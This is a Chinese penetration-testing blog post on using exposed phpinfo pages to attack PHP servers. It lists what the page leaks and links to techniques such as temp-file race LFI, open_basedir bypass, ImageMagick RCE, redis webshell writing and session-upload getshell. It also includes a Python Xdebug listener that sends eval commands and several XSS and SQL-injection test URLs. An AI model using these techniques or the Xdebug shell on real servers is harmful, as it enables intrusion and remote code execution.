phpinfo渗透测试利用

2019年11月9日00:01:10 发表评论

0x00 基本信息

system info

phpinfo渗透测试利用

详细的操作系统信息,为提权做准备

extension_dir

phpinfo渗透测试利用
php扩展的路径

真实ip

phpinfo渗透测试利用
cdn什么的都不存在的,找到真实ip,扫一扫旁站,没准就拿下几个站。

web根目录

phpinfo渗透测试利用

临时文件路径

phpinfo渗透测试利用

部分内容被隐藏
评论刷新后查看

参考:http://dann.com.br/php-winning-the-race-condition-vs-temporary-file-upload-alternative-way-to-easy_php-n1ctf2018/

0x02 重要配置

allow_url_include

远程文件包含,但是一般不会开启

部分内容被隐藏
评论刷新后查看

PHP绕过open_basedir列目录的研究

php5全版本绕过open_basedir读文件脚本

绕过open_basedir读文件脚本

0x03扩展

imagick

前段时间影响比较大的漏洞,注意看版本。

漏洞影响ImageMagick 6.9.3-10之前的版本,包括ubuntu源中安装的ImageMagick。

ImageMagick 漏洞利用方式及分析

ImageMagick远程执行漏洞分析及利用

libxml

libxml 2.9以前的版本默认支持并开启了外部实体的引用,服务端解析用户提交的 xml 文件时未对 xml 文件引用的外部实体(含外部普通实体和外部参数实体)做合适的处理,会导致XXE。

memcache

Memcache未授权访问漏洞利用及修复

redis

利用redis写webshell

session

1.序列化的一些问题
phpinfo渗透测试利用
序列化处理器不一致导致对象注入

当一个上传在处理中,同时POST一个与INI中设置的session.upload_progress.name同名变量时,当PHP检测到这种POST请求时,它会在$_SESSION中添加一组数据。所以可以通过Session Upload Progress来设置session。

具体可以看另一篇文章php对象注入总结

2.session.upload_progress加本地文件包含=getshell

http://skysec.top/2018/04/04/amazing-phpinfo/#session-upload-progress

xdebug

xdebug命令执行

Xdebug: A Tiny Attack Surface

Xdebug 攻击面在 PhpStorm 上的现实利用

http://skysec.top/2018/04/04/amazing-phpinfo/#Xdebug

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#!/usr/bin/python2
import socket

ip_port = ('0.0.0.0',9000)
sk = socket.socket()
sk.bind(ip_port)
sk.listen(10)
conn, addr = sk.accept()

while True:
    client_data = conn.recv(1024)
    print(client_data)

    data = raw_input('>> ')
    conn.sendall('eval -i 1 -- %s\x00' % data.encode('base64'))

GOPHER

主要在ssrf中使用

利用 Gopher 协议拓展攻击面

fastcgi

Fastcgi协议分析 && PHP-FPM未授权访问漏洞 && Exp编写

0x04其它

OPCACHE

php不存在缓存文件,但是其有opcache,如果有文件上传就可以进行覆盖并getshell

‘act=’问题

测试版本:PHP Version 5.6.22:
发掘方法:右键源代码搜索:act=

1
2
3
4
http-sql-inject:http://target/phpinfo.php?act=Function
xss:http://target/phpinfo.php/'"/><script>alert(1)</script>
csrf或跨域名点击劫持:http://target/phpinfo.php#bottom#fghj#dfghjk 
xss:http://target/phpinfo.php?act=rt&callback=<script>alert(1)</script>

域&用户

phpinfo页面还能看到当前域,当前登录用户

工具

https://github.com/GoSecure/php7-opcache-override

发表评论

后发表评论